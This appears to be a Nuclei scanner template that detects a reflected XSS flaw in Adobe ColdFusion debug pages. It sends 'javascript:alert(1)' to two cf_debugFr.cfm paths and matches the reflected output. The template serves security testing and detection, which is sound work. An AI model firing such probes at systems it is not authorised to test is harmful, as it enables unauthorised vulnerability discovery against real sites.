nuclei-templates/vulnerabilities/other/coldfusion-debug-xss.yaml

31 lines
719 B
YAML
Raw Normal View History

2021-07-01 17:01:01 +00:00
id: coldfusion-debug-xss
info:
name: Adobe ColdFusion Debug Page XSS
author: dhiyaneshDK
severity: medium
2021-07-02 15:25:33 +00:00
reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml
2021-07-01 17:01:01 +00:00
tags: adobe,xss
requests:
- method: GET
path:
- '{{BaseURL}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1)'
- '{{BaseURL}}/cfusion/debug/cf_debugFr.cfm?userPage=javascript:alert(1)'
2021-07-03 19:52:08 +00:00
2021-07-01 17:01:01 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"cf_main_cf" src="javascript:alert(1)"'
2021-07-03 19:52:08 +00:00
2021-07-01 17:01:01 +00:00
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200